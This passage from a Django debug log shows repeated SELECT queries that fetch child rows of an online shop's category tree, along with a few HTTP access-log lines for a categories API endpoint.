"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:56:02,360 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:56:02,363 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:56:02,367 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:56:02,369 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:56:02,372 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:56:02,376 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:56:02,378 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:56:02,381 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:56:02,383 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:56:02,386 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:56:02,388 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:56:02,393 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:56:02,397 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:56:02,401 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:56:02,404 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:56:02,408 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:56:02,412 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:56:02,415 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:56:02,417 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:56:02,420 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:56:02,422 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:56:02,426 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:56:02,429 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:56:02,431 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:56:02,433 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:56:02,436 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:56:02,438 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:56:02,443 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:56:02,447 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:56:02,451 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:56:02,456 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:56:02,460 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:56:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:57:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 12:00:58,779 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:00:58,790 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:00:58,797 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:00:58,801 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:00:58,807 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:00:58,811 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:00:58,815 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:00:58,819 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:00:58,823 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:00:58,829 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:00:58,833 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:00:58,838 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:00:58,842 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:00:58,846 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:00:58,852 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:00:58,856 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:00:58,860 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:00:58,864 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:00:58,868 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:00:58,875 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:00:58,879 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:00:58,883 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:00:58,887 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:00:58,891 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:00:58,896 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:00:58,902 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:00:58,907 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:00:58,910 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:00:58,913 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:00:58,917 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:00:58,924 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:00:58,928 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:00:58,932 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:00:58,936 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:00:58,940 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" 